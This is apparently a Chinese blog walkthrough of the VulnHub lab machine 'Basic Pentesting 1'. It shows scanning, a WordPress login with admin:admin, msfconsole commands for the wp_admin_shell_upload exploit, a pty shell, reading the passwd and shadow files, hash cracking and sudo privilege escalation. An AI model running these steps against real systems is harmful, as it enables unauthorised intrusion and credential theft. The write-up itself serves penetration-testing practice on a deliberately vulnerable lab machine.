vulnhub-Basic Pentesting 1靶机

vulnhub:https://www.vulnhub.com/entry/basic-pentesting-1,216/

导入靶机,和kali同一网段,扫描

image-20240923112520998

扫描到靶机IP为192.168.114.129,扫描端口

image-20240923112550973

扫描出三个端口,存在网站服务,访问

image-20240923112642037

扫描网站目录

image-20240923112828379

扫描到一个secret目录,访问

image-20240923112904892

在网页最底下可以看到这是个WordPress的站,尝试访问管理页面(wp-admin)

重定向到了登陆界面

image-20240923113021848

存在弱密码组合admin:admin

image-20240923113055956

我们可以使用MSF的WordPress利用脚本来获取shell

msfconsole

use exploit/unix/webapp/wp_admin_shell_upload

show options

set username admin

set password admin

set targeturi /secret/

set rhosts 192.168.114.129

image-20240923113422707

执行脚本,开启meterpreter会话

image-20240923113506805

进入命令行

shell

python -c 'import pty;pty.spawn("/bin/bash")'

查看passwd和shadow文件

image-20240923113853079

在shadow文件里找到marlinspike的密码哈希,复制进行破解,得到marlinspike

使用这个账户登录

image-20240923114016099

使用sudo -l命令发现我们可以无密码使用任意sudo命令,sudo su提权

image-20240923114132763

提权完成

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值